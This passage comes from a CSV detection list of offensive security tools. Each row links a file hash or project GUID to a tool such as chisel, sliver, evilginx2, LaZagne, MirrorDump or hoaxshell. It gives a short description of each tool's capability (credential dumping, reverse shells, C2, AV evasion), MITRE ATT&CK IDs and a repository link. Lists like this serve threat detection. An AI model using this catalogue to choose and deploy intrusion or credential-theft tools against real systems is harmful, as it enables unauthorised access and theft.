"*55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef*",".{0,1000}55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d*",".{0,1000}55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" 
"*55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c*",".{0,1000}55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*",".{0,1000}55F0368B\-63DA\-40E7\-A8A5\-289F70DF9C7F.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a*",".{0,1000}55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2*",".{0,1000}564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275*",".{0,1000}56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f*",".{0,1000}566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184*",".{0,1000}5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc*",".{0,1000}56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be*",".{0,1000}56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a*",".{0,1000}56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821*",".{0,1000}56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" 
"*56F981FD-634A-4656-85A7-5636658E1F94*",".{0,1000}56F981FD\-634A\-4656\-85A7\-5636658E1F94.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36*",".{0,1000}5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f*",".{0,1000}5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd*",".{0,1000}573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61*",".{0,1000}5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a*",".{0,1000}5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
"*57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2*",".{0,1000}57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577*",".{0,1000}578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9*",".{0,1000}578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa*",".{0,1000}579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25*",".{0,1000}57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*57A893C7-7527-4B55-B4E9-D644BBDA89D1*",".{0,1000}57A893C7\-7527\-4B55\-B4E9\-D644BBDA89D1.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - 
TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732*",".{0,1000}57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9*",".{0,1000}57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","0","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*",".{0,1000}57D4D4F4\-F083\-47A3\-AE33\-AE2500ABA3B6.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097*",".{0,1000}57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e*",".{0,1000}57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c*",".{0,1000}57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7*",".{0,1000}5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4*",".{0,1000}582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*58338E42-6010-493C-B8C8-2FD2CFC30FFB*",".{0,1000}58338E42\-6010\-493C\-B8C8\-2FD2CFC30FFB.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee*",".{0,1000}58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d*",".{0,1000}5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5*",".{0,1000}5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1*",".{0,1000}5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b*",".{0,1000}588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*58B32FCA-F385-4500-9A8E-7CBA1FC9BA13*",".{0,1000}58B32FCA\-F385\-4500\-9A8E\-7CBA1FC9BA13.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc*",".{0,1000}58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*58d82bca11a41a01d0ddfa7d105e6a48*",".{0,1000}58d82bca11a41a01d0ddfa7d105e6a48.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83*",".{0,1000}5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65*",".{0,1000}590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*59224C16-39C5-49EA-8525-F493DC1D66FE*",".{0,1000}59224C16\-39C5\-49EA\-8525\-F493DC1D66FE.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - 
